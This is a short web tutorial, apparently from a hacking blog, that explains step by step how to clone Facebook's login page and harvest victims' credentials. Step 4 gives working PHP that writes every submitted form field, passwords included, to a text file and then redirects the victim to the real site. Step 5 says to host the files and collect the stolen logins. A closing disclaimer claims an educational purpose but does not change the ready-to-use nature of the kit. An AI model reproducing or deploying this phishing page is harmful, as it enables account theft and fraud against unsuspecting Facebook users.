Today I will show you how to create a phishing page for facebook
What is a Phishing ?
Is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a
trustworthy entity in an electronic communication.
How to create a phishing page for Facebook?
You have lots of tools to create a phishing page but we will do it manually to keep it simple and clean, follow the below steps:
Step 1:
navigate to www.facebook.com
Step 2:
Then right click -> view page source
Step 3:
Search for action=”https://www.facebook.com/login.php” and change it to action=”post.php“, and save it as index.php
Step 4:
open a text editor and type in the following php code:
<?php header ('Location:https://www.facebook.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Now save it as post.php
Step 5:
Upload both index.php and post.php to a hosting space, when a victim logs in a text file called username.txt will be created on your host you will find them there.
** Disclaimer **
Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator is responsible for the comments posted on this website.